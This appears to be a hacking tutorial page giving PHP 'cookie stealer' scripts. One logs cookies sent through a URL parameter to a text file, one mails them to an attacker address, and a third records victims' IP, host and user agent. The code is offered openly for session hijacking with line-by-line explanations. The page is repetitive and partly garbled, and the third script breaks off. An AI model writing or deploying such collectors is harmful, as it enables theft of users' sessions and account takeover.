Here is the simple Cookie Stealer code:
Cookie stored in File:
$cookie = $HTTP_GET_VARS["cookie"]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable.
$steal = fopen("cookiefile.txt", "a"); This open the cookiefile in append mode so that we can append the stolen cookie.
fwrite($steal, $cookie ."\\n"); This will store the stolen cookie inside the file.
fclose($steal); close the opened file.
Another version: Sends cookies to the hacker mail
The above code will mail the cookies to hacker mail using the PHP() mail function with subject "Stolen cookies".
Third Version
The above Cookie stealer will store the following information:
»» READMORE...
Cookie stored in File:
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("cookiefile.txt", "a");
fwrite($steal, $cookie ."\\n");
fclose($steal);
?>
$cookie = $HTTP_GET_VARS["cookie"]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable.
$steal = fopen("cookiefile.txt", "a"); This open the cookiefile in append mode so that we can append the stolen cookie.
fwrite($steal, $cookie ."\\n"); This will store the stolen cookie inside the file.
fclose($steal); close the opened file.
Another version: Sends cookies to the hacker mail
$cookie = $HTTP_GET_VARS["cookie"]; mail("hackerid@mailprovider.com", "Stolen Cookies", $cookie);
?>
The above code will mail the cookies to hacker mail using the PHP() mail function with subject "Stolen cookies".
function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
The above Cookie stealer will store the following information:
- Ip address
- port number
- host(usually computer-name)
- user agent
- cookie